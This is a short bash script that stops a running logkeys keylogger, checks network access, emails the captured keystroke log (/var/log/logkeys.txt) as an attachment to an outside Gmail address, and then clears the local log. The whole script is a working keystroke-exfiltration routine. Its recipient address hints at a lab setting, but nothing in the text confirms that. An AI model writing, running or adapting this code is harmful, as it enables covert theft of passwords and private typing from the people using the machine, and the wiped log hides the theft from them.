#!/bin/bash
sudo logkeys -k
ping -q -w 1 -c 1 `ip r | grep default | cut -d ' ' -f 3` > /dev/null && echo ok || exit 1
echo $(date) |sudo  mail -s  "$(hostname) is $(date)" -A  /var/log/logkeys.txt Laboratorio.epistest@gmail.com
sleep 5
sudo echo "" > /var/log/logkeys.txt
